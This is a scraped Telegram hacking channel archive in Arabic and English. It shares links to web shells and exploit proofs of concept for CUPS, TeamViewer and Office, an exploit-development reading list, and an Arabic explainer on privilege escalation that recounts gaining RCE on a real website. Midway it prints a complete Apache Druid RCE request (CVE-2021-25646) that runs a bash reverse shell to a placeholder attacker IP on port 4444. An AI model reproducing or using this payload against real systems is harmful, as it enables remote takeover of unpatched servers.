KILLER CODE
Open in Telegram
No data
Subscribers
-224 hours
-187 days
+25330 days
Posts Archive
عشان تعرفوا انه مهزق و معندهوش شخصية و فارغ و فاشل و طبعا مش هذكر اسمه انا على بالي انه مات ولا غار في ستين داهية لان اخبار الفاشل ده انقطعت لاني ببساطة مش شايفه و طبعا مش ههينه هخليها حسرة في قلبه و مش هنفذ مبتغاه لانه اقل من اني حتى اديله اهتمام 😂
Some of the best web shells that you might need! 🔥
https://github.com/TheBinitGhimire/Web-Shells
An ssh honeypot with the XZ backdoor. CVE-2024-3094
https://github.com/lockness-Ko/xz-vulnerable-honeypot?s=35
CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177: Linux OpenPrinting CUPS RCE
PoC: https://github.com/RickdeJager/cupshax
patch:
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
#exploit #git #pentest #redteamCVE-2024-7479 & CVE-2024-7481: TeamViewer User to Kernel LPE
PoC: https://youtu.be/lUkAMAK-TPI
exploit: https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481
Affected: * from 15.0.0 before 15.58.4 * from 14.0.0 before 14.7.48796 * from 13.0.0 before 13.2.36225 * from 12.0.0 before 12.0.259312 * from 11.0.0 before 11.0.259311#lpe #pentest #redteam #exploit
Windows exploit development and windows kernel resources
00 - Windows Rootkits
01 - Windows kernel mitigations
02 - Windows kernel shellcode
03 - Windows kernel exploitation
04 -Windows kernel GDI exploitation
05 - Windows kernel Win32k.sys research
06 - Windows Kernel logic bugs
07 - Windows kernel driver development
08 - Windows internals
09 - Advanced Windows debugging
10 - 0days - APT advanced malware research
11 - Video game cheating (kernel mode stuff sometimes)
12 - Hyper-V and VM / sandbox escape
13 - Fuzzing
14 - Windows browser exploitation
15 - books, certifications and courses
and more :)
- Windows system programming Security
- Windows kernel programming fundamentals
- Windows exploitation
- Live 🔻 Modern Windows kernel exploitation
Article important for windows kernel programming and exploitation.
Windows Exploitation Links
https://github.com/r3p3r/nixawk-awesome-windows-exploitation
https://github.com/connormcgarr/Exploit-Development
https://github.com/connormcgarr/Kernel-Exploits
https://github.com/ElliotAlderson51/Exploit-Writeups
https://github.com/rhamaa/Binary-exploit-writeups#windows_stack_overflows
https://github.com/wtsxDev/Exploit-Development
https://www.corelan.be
https://malwareunicorn.org/#/workshops
https://p.ost2.fyi
http://www.securitytube.net
https://ctf101.org/binary-exploitation/overview
Windows Stack Protection I: Assembly Code
http://www.bowneconsultingcontent.com//pub/EH/proj/cloud/ED301c_tkp/ED301c_tkp.htm
Windows Stack Protection II: Exploit Without ASLR
http://www.bowneconsultingcontent.com//pub/EH/proj/cloud/ED302c_tkp/ED302c_tkp.htm
Windows Stack Protection III: Limitations of ASLR
http://www.bowneconsultingcontent.com//pub/EH/proj/cloud/ED303c_tkp/ED303c_tkp.htm
Exploit Development
Ch 6: The Wild World of Windows
https://samsclass.info/127/lec/EDch6.pdf
SEH-Based Stack Overflow Exploit
https://samsclass.info/127/proj/ED319.htm
Exploiting Easy RM to MP3 Converter on Windows with ASLR
https://samsclass.info/127/proj/ED318.htm
Bypassing Browser Memory Protections
https://www.blackhat.com/presentations/bh-usa-08/Sotirov_Dowd/bh08-sotirov-dowd.pdf
The Basics of Exploit Development 1: Win32 Buffer Overflows
https://www.coalfire.com/the-coalfire-blog/the-basics-of-exploit-development
The Basics of Exploit Development 2: SEH Overflows
https://www.coalfire.com/the-coalfire-blog/the-basics-of-exploit-development-2-seh-overflows
The Basics of Exploit Development 3: Egg Hunters
https://www.coalfire.com/the-coalfire-blog/the-basics-of-exploit-development-3-egg-hunters
The Basics of Exploit Development 4: Unicode Overflows
https://www.coalfire.com/the-coalfire-blog/the-basics-of-exploit-development-4-unicode-overfl
The Basics of Exploit Development 5: x86-64 Buffer Overflows
https://www.coalfire.com/the-coalfire-blog/the-basics-of-exploit-development-5-x86-64-buffer
- roadmap for exploit development
- roadmap for exploit development 2
Res:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
https://malwareunicorn.org/workshops/re101.html#0
https://www.youtube.com/watch?v=qSnPayW6F7U
https://twitter.com/pedrib1337/status/1696169136991207844?s=46
https://www.pentesteracademy.com/course?id=3
https://nora.codes/tutorial/an-intro-to-x86_64-reverse-engineering/
https://www.reddit.com/r/ExploitDev/comments/7zdrzc/exploit_development_learning_roadmap/
https://github.com/Cryptogenic/Exploit-Writeups
https://www.youtube.com/@pwncollege/videos
https://repo.zenk-security.com/Magazine%20E-book/Hacking-%20The%20Art%20of%20Exploitation%20(2nd%20ed.%202008)%20-%20Erickson.pdf
http://www.phrack.org/issues/49/14.html#article
https://github.com/justinsteven/dostackbufferoverflowgood
https://github.com/FabioBaroni/awesome-exploit-development
https://github.com/CyberSecurityUP/Awesome-Exploit-Development
https://github.com/RPISEC/MBE
https://github.com/hoppersroppers/nightmare
https://github.com/shellphish/how2heap
https://www.youtube.com/watch?v=tMN5N5oid2c
https://dayzerosec.com/blog/2021/02/02/getting-started.html
https://github.com/Tzaoh/pwning
💻 Microsoft Office NTLMv2 Disclosure (CVE-2024-38200)
A new vulnerability related to capturing NTLMv2 hashes via Office URI schemes has been discovered. The http:// protocol can be used for attacks such as NTLM relay to a Domain Controller.
Microsoft 365 and Office 2019 versions are vulnerable, as they open remote files without warnings, unlike earlier versions. The exploit involves using a 302 redirect and abusing GPO misconfigurations to capture NTLMv2 hashes over SMB and HTTP.
🔗 Source:
https://github.com/passtheticket/CVE-2024-38200
#windows #office #ntlm #relay
Cross-site scripting (XSS) Cheat Sheet [ PortSwigger Research ] 🥇
This Cheat Sheet is Regularly Updated
CVE-2021-25646 Apache Druid RCE POC 🪟
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/x.x.x.x/4444 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
Repost from ExploitTime
ليه privilege escalation مهم ؟
لو قولنا ان شخص اخترق نظام معين وفيه ٣ users فالOS فيه خدمة Protection يعني مينفعش user يعدل عند user حاجه مينفعش user احيانا يقرء حاجه عند user لو الuser غير صلحيات ملف طيب هنرجع ليها تاني دي .
الOS بيديك قدره محدوده وقدرة كبيره :
المحدوده لما تكون user عادي
كبيره لما تكون Administrator او root
هنرجع ليهم تاني برضو .
لو بصيت عندك هتلاقي اني انا كuser مش قادر اعمل حاجه فوقي وجنبي يعني ايه يعني مش قادر اعمل حاجه اكبر من صلحياتي ومش قادر حتى اشوف صلحيات حد في مستوايا user تاني يعني
نستنتج ان عندنا نوعين من privEsc دا بس اختصار للكلمه اللي فوق وهي ترقية الصلحيات هو Horizontal و Vertical يعني ترقيه راسي وافقي ايه ياعم الكلام دا انت رايح تضبط قناة تلفزيون :)
نوضح لما اقول Horizontal يعني برقي صلحياتي انا كuser لصلحيات حد جنبي يعني لو في ٢ user واحد اسمه ahmed و mohammed فاAhmed هيرقي صلحياته انه يقدر يعمل كل حاجه على محمد او على الاقل ياكسس حاجه من عند محمد مش مصرح ليه يعملها ولو بصيت هتلاقي انهم زي خط كدا جنب بعضه واحد ياخذ من اللي جنبه علشان كدا بنسميها Horizontal
طيب vertical لما حد بقى حابب يطلع لصلحيات اللي اعلى منه زي Root مثلا ومش شرط الroot بس في web app لو بصينا مثلا في CMS زي Wordpress في مجموعه من الUsers كل واحد فيهم في منطقه شكل زي editor و admin و user العادي في حالة ان user رقى صلاحياته لاعلى بنسميها vertical المهم كل الاثنين مهمين
مثال حقيقي : كنت فتره جبت RCE في موقع كبير TutorialsPoint اللي موجود على السيرفر سوق كبير بس كان في user صلاحياته اعلى من user المهم اني اتحركت وروحت لuser تاني عملت عليه ومنه حجات كتير واستفدت من كدا لان user الحالي للاسف كان في docker container وهنا في حاجه لو حذفت حاجه هترجع تاني لو عملت حاجه هي معذوله وكمان لما قولت هقفل docker service مكنش معايا صلاحيات وهنا مشكله مش عارف تعمل حاجه حتى كونك تبعت http request لموقع تاني مينفعش فموضوع ترقية الصلاحيات موضوع مهم والاهم هو vertical لانك لو وصلت لroot تعرف تعمل حاجه لو حتى ياسيدي تقدر تشيل خالص user اللي عملك ازمه لذلك هو مهم والنظام بيديله حرية في التعامل في windows لما بتشغل برنامج بRun as Administrator فانت هنا بتشغله بصلحيات عاليه
في لينكس لو شغلت البرنامج بSudo هنا بتديله صلاحيات عاليه جرب كدا افتح sudo مع mousepad مثلا هتلاقي في msg بتقول خلي بالك من التعديلات اللي هتعملها لانها شغاله بصلاحيات عاليه يعني اي تعديل هتحفظ ولا على ملفات النظام فالعملية دي عملية مهمه كونك تجيب shell طيب وريني هتعمل ايه بعد كدا وخاصة في web app الweb app الShell اللي بتجيبه بيكون مقيد مع Apache و nginx و حتى iis فمهم ترقية الصلحيات
اه علشان الحساسيه الزياده لو قولت ترقية صلاحيات تصعيد صلاحيات قولت permission escalation او privEsc او اي كلمة تدل على المعنى
------------------
Services اللي بقدمها مثبته في القناة
للي عاوز
------------------
#pentesting@Abdalrahman0x80_channel
بما ان الاغلبية الساحقة صوتت اني اعمل شرح للكورس الي فوق مع برنامج COLASOFT CAPSA فخلاص تم أفضى و هجزهم
ايه رايكم اشرح لكم الكورس الي لسه منزله شوية و اعمل عنه سلسلة لانه كورس مظلوم و مش واخد حقه بجانب الكورس الي بجهزه عن برنامج COLA SOFT CAPSA
